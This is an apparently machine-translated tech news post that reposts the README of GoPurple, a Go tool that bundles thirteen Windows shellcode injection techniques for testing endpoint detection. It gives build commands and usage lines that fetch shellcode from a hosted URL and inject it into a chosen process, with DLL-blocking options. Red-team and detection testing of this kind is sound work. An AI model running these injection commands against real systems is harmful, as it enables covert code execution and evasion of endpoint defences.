iGuRu

Real-time Technology News. Opinions & Tweaks

home / News / GoPurple: Shell code injection techniques

GoPurple: Shell code injection techniques

GoPurple is a simple collection of various shell code injection techniques, aimed at streamlining the evaluation process for end point detection, but also a challenge to enter the world of Golang.

demo1 - GoPurple: Shell code injection techniques

Installation

git clone https://github.com/sh4hin/GoPurple.git

cd GoPurple

go build gopurple.go

Use

-a string
Program command line arguments
-b string
block DLL mode (nonms / onlystore for QueueUserAPC)
-p int
Process ID to inject shellcode into
-prog string
program to inject into
-t string
shellcode injection technique to use:
1: CreateFiber
2: syscall
3: CreatetThreadNative
4: CreateProcess
5: EtwpCreateEtwThread
6: CreateRemoteThread
7: RtlCreateUserThread
8: CreateThread
9: CreateRemoteThreadNative
10: CreateProcessWithPipe
11: QueueUserAPC
12: CreateThreadpoolWaitpool
13: BananaPhone
-u string
URL hosting the shellcode

Betting

1 - gopurple.exe -u urlhostingpayload -t 1 (CreateFiber)

2 - gopurple.exe -u urlhostingpayload -t 2 (Syscall)

3 - gopurple.exe -u urlhostingpayload -t 3 (CreatetThreadNative)

4 - gopurple.exe -u urlhostingpayload -t 4 (CreateProcess)

5 - gopurple.exe -u urlhostingpayload -t 5 (EtwpCreateEtwThread)

6 - gopurple.exe -u urlhostingpayload -t 6 -p tagetprocess (CreateRemoteThread)

7 - gopurple.exe -u urlhostingpayload -t 7 -p tagetprocess (RtlCreateUserThread)

8 - gopurple.exe -u urlhostingpayload -t 8 // (CreateThread)

9 - gopurple.exe -u urlhostingpayload -t 9 -p tagetprocess (CreateRemoteThreadNative)

10 - gopurple.exe -u urlhostingpayload -t 10 -prog porgram -a processargument (ex: C: \ Windows \ System32 \ WindowsPowerShell \ v1.0) and processargument (ex: Get-Process) (CreateProcessWithPipe)

11 - gopurple.exe -u urlhostingpayload -t 11 -p targetpidasparentprocess -prog programtoinjectshellcodeinto -b methodtoblockdll (nonms or onlystore) (QueueUserAPC)

nonms = only DLLs that are signed by Microsoft can hook into the process

onlystore = only Microsoft store application's process can hook into the process

12 - gopurple.exe -u urlhostingpayload -t 12 (CreateThreadpoolWaitpool)

13 - gopurple.exe -u urlhostingpayload -t 13 (BananaPhone)

Application snapshots

demo2 - GoPurple: Shell code injection techniques

demo3 - GoPurple: Shell code injection techniques

You can download the program from here.


Subscribe to our newsletter

no spam

Read them Technology News from all over the world, with the validity of iGuRu.gr

Follow us on Google News

Competition:

You May Also Like

KB4601319 go again Problems with File History and webcam
Exchange anti-hacking tool from Microsoft
System Rescue CD 8.0.0 ISO available for download

Reader Interactions

Comment Policy:

IGuRu.gr does not publish the comments immediately. Malicious comments, comments that include ads, or comments that are offensive are deleted without notice. We do not adopt the opinions expressed by our readers.
Your comments will be displayed after approval by the administrators

Leave your comment

Your email address is not published. Τα υποχρεωτικά πεδία σημειώνονται με *